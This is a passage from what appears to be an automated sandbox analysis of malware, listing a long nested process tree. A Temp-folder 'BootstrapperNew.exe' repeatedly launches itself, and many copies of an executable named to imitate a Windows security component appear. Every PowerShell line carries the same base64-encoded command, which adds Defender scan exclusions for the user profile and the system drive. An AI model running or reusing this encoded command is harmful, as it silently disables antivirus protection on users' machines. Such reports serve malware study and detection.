        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        291⤵
        
        PID:7564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        292⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        291⤵
        
        PID:6340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        292⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        292⤵
        System Location Discovery: System Language Discovery
        
        PID:3204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        293⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        293⤵
        
        PID:7412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        294⤵
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        294⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        295⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        295⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        296⤵
        System Location Discovery: System Language Discovery
        
        PID:6016
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        296⤵
        Checks computer location settings
        
        PID:2564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        297⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        297⤵
        Drops file in Windows directory
        
        PID:6892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        298⤵
        
        PID:4676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        299⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        298⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:7344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        299⤵
        
        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        299⤵
        
        PID:7316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        300⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        300⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        301⤵
        
        PID:7904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        302⤵
        
        PID:7884
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        301⤵
        Drops file in Windows directory
        
        PID:7108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        302⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        302⤵
        Checks computer location settings
        Drops file in Windows directory
        
        PID:4332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        303⤵
        
        PID:7964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        304⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        303⤵
        System Location Discovery: System Language Discovery
        
        PID:6000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        304⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        304⤵
        Checks computer location settings
        
        PID:2612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        305⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        305⤵
        Checks computer location settings
        
        PID:4508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        306⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        306⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        307⤵
        
        PID:4112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        308⤵
        
        PID:3464
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        307⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        308⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        308⤵
        
        PID:920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        309⤵
        
        PID:7004
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        309⤵
        Checks computer location settings
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        310⤵
        System Location Discovery: System Language Discovery
        
        PID:7204
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        310⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        311⤵
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        311⤵
        
        PID:7288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        312⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        312⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        313⤵
        System Location Discovery: System Language Discovery
        
        PID:1496
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        312⤵
        
        PID:5712
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        311⤵
        
        PID:2848
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        310⤵
        
        PID:7212
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        309⤵
        
        PID:5908
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        308⤵
        
        PID:5384
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        307⤵
        
        PID:2228
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        306⤵
        
        PID:6512
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        305⤵
        
        PID:8052
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        304⤵
        
        PID:7656
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        303⤵
        
        PID:5128
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        302⤵
        
        PID:7748
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        301⤵
        
        PID:5516
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        300⤵
        
        PID:7580
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        299⤵
        
        PID:8036
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        298⤵
        
        PID:2324
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        297⤵
        
        PID:3512
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        296⤵
        
        PID:5932
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        295⤵
        
        PID:3696
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        294⤵
        
        PID:5772
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        293⤵
        
        PID:4648
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        292⤵
        
        PID:7588
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        291⤵
        
        PID:6684
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        290⤵
        
        PID:3024
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        289⤵
        
        PID:7608
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        288⤵
        
        PID:5396
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        287⤵
        
        PID:6928
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        286⤵
        
        PID:5212
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        285⤵
        
        PID:2068
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        284⤵
        
        PID:6876
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        283⤵
        
        PID:7424
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        282⤵
        
        PID:5896
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        281⤵
        
        PID:5276
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        280⤵
        
        PID:3156
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        279⤵
        
        PID:6376
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        278⤵
        
        PID:8056
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        277⤵
        
        PID:5776
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        276⤵
        
        PID:5368
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        275⤵
        
        PID:6244
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        274⤵
        
        PID:4512
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        273⤵
        
        PID:6160
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        272⤵
        
        PID:7236
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        271⤵
        
        PID:7016
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        270⤵
        
        PID:7488
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        269⤵
        
        PID:7416
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        268⤵
        
        PID:4288
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        267⤵
        
        PID:6340
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        266⤵
        
        PID:5476
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        265⤵
        
        PID:6920
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        264⤵
        
        PID:2940
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        263⤵
        
        PID:5792
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        262⤵
        
        PID:6400
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
